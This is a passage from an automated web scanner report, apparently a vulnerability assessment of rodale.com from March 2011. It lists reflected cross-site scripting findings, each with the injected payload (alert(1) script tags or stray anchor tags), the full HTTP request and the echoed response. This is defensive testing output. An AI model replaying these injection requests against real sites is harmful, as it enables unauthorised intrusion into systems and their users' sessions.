<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/contact?6cc77"><a>02eecc34017=1" title="Register" class="moreLink">
...[SNIP]...

2.140. http://www.rodale.com/cookware-comparison [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /cookware-comparison

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 470d9"><a>52365c65d77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cookware-comparison470d9"><a>52365c65d77 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:38 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:40 GMT
Date: Thu, 10 Mar 2011 17:07:41 GMT
Content-Length: 22473
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page cookware-comparison470d9"><a>52365c65d77 node node-958">
...[SNIP]...

2.141. http://www.rodale.com/cookware-comparison [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /cookware-comparison

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59909"><script>alert(1)</script>0387b9ce502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookware-comparison?59909"><script>alert(1)</script>0387b9ce502=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:36 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:07:38 GMT
Date: Thu, 10 Mar 2011 17:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=5fgvfhe6bcnq77b418rv6o9dh3; path=/; domain=.rodale.com
Content-Length: 40467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/cookware-comparison?59909"><script>alert(1)</script>0387b9ce502=1&title=How+to+Choose+the+Safest%2C+Healthiest%2C+Best-Cooking+Cookware">
...[SNIP]...

2.142. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19eb2"><a>ee15deb4ca8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp19eb2"><a>ee15deb4ca8/sub/0,,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:14 GMT
Date: Thu, 10 Mar 2011 17:20:14 GMT
Content-Length: 22508
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp19eb2"><a>ee15deb4ca8 corp19eb2">
...[SNIP]...

2.143. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><a>be12606df96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp/sub2baf1"><a>be12606df96/0,,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:42 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:43 GMT
Date: Thu, 10 Mar 2011 17:20:43 GMT
Content-Length: 22487
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp corp-sub2baf1"><a>be12606df96 node node-958">
...[SNIP]...

2.144. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e36"><script>alert(1)</script>f26dd7b40d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/0,,1-28,00.html96e36"><script>alert(1)</script>f26dd7b40d4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:21:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:51:11 GMT
Date: Thu, 10 Mar 2011 17:21:12 GMT
Content-Length: 22520
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/0,,1-28,00.html96e36"><script>alert(1)</script>f26dd7b40d4" title="Register" class="moreLink">
...[SNIP]...

2.145. http://www.rodale.com/corp/sub/0,,1-28,00.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ef5"><script>alert(1)</script>ca9085abe4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/0,,1-28,00.html?d7ef5"><script>alert(1)</script>ca9085abe4f=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:09 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:10 GMT
Date: Thu, 10 Mar 2011 17:20:10 GMT
Content-Length: 22530
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/0,,1-28,00.html?d7ef5"><script>alert(1)</script>ca9085abe4f=1" title="Register" class="moreLink">
...[SNIP]...

2.146. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 444b0"><a>207d0a98d65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp444b0"><a>207d0a98d65/sub/1,1874,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:20 GMT
Date: Thu, 10 Mar 2011 17:20:20 GMT
Content-Length: 22516
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp444b0"><a>207d0a98d65 corp444b0">
...[SNIP]...

2.147. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f86f1"><a>bd8b9252f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp/subf86f1"><a>bd8b9252f57/1,1874,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:55 GMT
Date: Thu, 10 Mar 2011 17:20:55 GMT
Content-Length: 22495
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp corp-subf86f1"><a>bd8b9252f57 node node-958">
...[SNIP]...

2.148. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d183"><script>alert(1)</script>e72a4b6dfaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/1,1874,1-28,00.html1d183"><script>alert(1)</script>e72a4b6dfaf HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:21:25 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:51:26 GMT
Date: Thu, 10 Mar 2011 17:21:26 GMT
Content-Length: 22528
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/1,1874,1-28,00.html1d183"><script>alert(1)</script>e72a4b6dfaf" title="Register" class="moreLink">
...[SNIP]...

2.149. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb43"><script>alert(1)</script>ca045b0cc82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/1,1874,1-28,00.html?5cb43"><script>alert(1)</script>ca045b0cc82=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:16 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:18 GMT
Date: Thu, 10 Mar 2011 17:20:18 GMT
Content-Length: 22538
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/1,1874,1-28,00.html?5cb43"><script>alert(1)</script>ca045b0cc82=1" title="Register" class="moreLink">
...[SNIP]...

2.150. http://www.rodale.com/cracker-recipes [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /cracker-recipes

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34703"><a>678cddf4509 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cracker-recipes34703"><a>678cddf4509 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:38 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:40 GMT
Date: Thu, 10 Mar 2011 17:07:41 GMT
Content-Length: 22461
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page cracker-recipes34703"><a>678cddf4509 node node-958">
...[SNIP]...

2.151. http://www.rodale.com/cracker-recipes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /cracker-recipes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63322"><script>alert(1)</script>165490ecc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cracker-recipes?63322"><script>alert(1)</script>165490ecc05=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:36 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:07:38 GMT
Date: Thu, 10 Mar 2011 17:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=je675u12adkjudcpost80l2lk6; path=/; domain=.rodale.com
Content-Length: 43476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/cracker-recipes?63322"><script>alert(1)</script>165490ecc05=1&title=The+Nickel+Pincher%3A+Easy%2C+Crispy%2C+Crunchy%2C+Healthy+Cracker+Recipes">
...[SNIP]...

2.152. http://www.rodale.com/crib-safety [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /crib-safety

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16fa9"><a>e5cb521aaaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /crib-safety16fa9"><a>e5cb521aaaa HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:31 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:32 GMT
Date: Thu, 10 Mar 2011 17:05:32 GMT
Content-Length: 22449
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page crib-safety16fa9"><a>e5cb521aaaa node node-958">
...[SNIP]...

2.153. http://www.rodale.com/crib-safety [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /crib-safety

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30689"><script>alert(1)</script>1050b34adef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /crib-safety?30689"><script>alert(1)</script>1050b34adef=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:29 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:31 GMT
Date: Thu, 10 Mar 2011 17:05:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=52jl41friqh7qvffque1iaaip6; path=/; domain=.rodale.com
Content-Length: 38116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/crib-safety?30689"><script>alert(1)</script>1050b34adef=1&title=How+to+Make+Sure+Your+Baby%E2%80%99s+Crib+Is+Safe+for+Sleeping">
...[SNIP]...

2.154. http://www.rodale.com/edible-insects [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /edible-insects

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa7"><a>3f6fc0f92fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /edible-insects1dfa7"><a>3f6fc0f92fc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:21 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:24 GMT
Date: Thu, 10 Mar 2011 17:05:24 GMT
Content-Length: 22458
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page edible-insects1dfa7"><a>3f6fc0f92fc node node-958">
...[SNIP]...

2.155. http://www.rodale.com/edible-insects [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /edible-insects

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb84"><script>alert(1)</script>04fb42251cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /edible-insects?fbb84"><script>alert(1)</script>04fb42251cf=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:20 GMT
Date: Thu, 10 Mar 2011 17:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=d5h3jgshu5ihvfckki8bmpufv5; path=/; domain=.rodale.com
Content-Length: 38947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/edible-insects?fbb84"><script>alert(1)</script>04fb42251cf=1&title=Pass+the+Mealworms+Please%3A+Why+Eating+Insects+Is+a+Good+Idea">
...[SNIP]...

2.156. http://www.rodale.com/environment [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /environment

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad203"><a>7fcd599f757 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /environmentad203"><a>7fcd599f757 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:22 GMT
Date: Thu, 10 Mar 2011 17:06:22 GMT
Content-Length: 22449
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
